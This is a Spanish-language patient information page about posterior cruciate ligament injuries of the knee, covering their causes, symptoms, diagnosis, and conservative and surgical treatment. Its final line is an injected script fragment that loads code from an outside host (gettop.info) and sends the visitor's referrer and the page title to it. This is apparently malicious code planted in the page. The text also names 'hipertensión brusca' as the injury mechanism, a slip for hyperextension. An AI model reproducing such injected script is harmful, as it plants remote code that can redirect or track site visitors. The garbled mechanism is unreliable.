CRUZADO POSTERIOR

El ligamento cruzado posterior (LCP) conecta al fémur con la tibia. Aunque se encuentra junto al LCA tiene una función diferente.
El LCP evita que la rodilla tenga juego hacia atrás.


Una característica importante de las lesiones del LCP es que puede llegar cicatrizar adecuadamente por lo tanto no todas sus lesiones hay que operarlas.

¿Cómo se lesiona el LCP?
La causa mas frecuente son las lesiones deportivas y los accidentes automovilísticos o las caídas. En la práctica deportiva el mecanismo mas frecuente es la hipertensión brusca de la rodilla y en los accidentes viales es un golpe en el frente de la pierna.

¿Cuáles son los síntomas de una lesión del LCP?
En los casos agudos hay dolor, inflamación y disminución de la movilidad. Al contrario de las lesiones del LCA, las lesiones del LCP no dan tanta sensación de inestabilidad a menos que sean muy graves.
A medida que los días pasan, la rodilla se va desinflamando, disminuyendo el dolor y la movilidad regresando, tanto así que las lesiones leves pueden pasar inadvertidas. Solo las lesiones graves dan inestabilidad.
Las lesiones crónicas se acompañan de inflamación y dolor ya que a menudo se acompañan de lesiones meniscales y del cartílago.

¿Cómo se diagnostica una lesión del LCP?
El diagnóstico se hace con la historia que nos cuenta el paciente y lo mas importante, con la exploración física. Estas lesiones se diagnostican con las manos ya que la rodilla tiene juego.
Aunque en las radiografías no se ven los ligamentos es importante tener éstos estudios para descartar alguna lesión ósea, especialmente si se trata de un accidente automovilístico.
La resonancia magnética nos confirmará el diagnóstico y nos ayudará a analizar el resto de estructuras al rededor de la rodilla.

¿Cómo se trata una lesión aguda del LCP?
Las lesiones leves deben de tratarse siempre de manera conservadora a base de:

  • Reposo y uso de muletas hasta que disminuya el dolor, se recomienda el uso de una férula o rodillera mecánica.
  • Analgésicos.
  • Hielo.
  • Fisioterapia.
  • La cirugía de urgencia se reserva solo para lesiones muy graves del LCP.
  • ¿Cómo se trata una lesión crónica del LCP?

Las lesiones crónicas del LCP pueden tratarse por dos razones, por inestabilidad y/o lesiones asociadas como meniscales o del cartílago.
La cirugía de reconstrucción del LCP es un procedimiento complejo, peligroso y con resultados variables. No cualquier cirujano está entrenado para realizarla.
En la cirugía se utiliza un injerto para colocarlo en lugar del LCP roto. Al igual que en el tratamiento del LCA hay varios tipos de injertos y de sistemas de fijación.

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;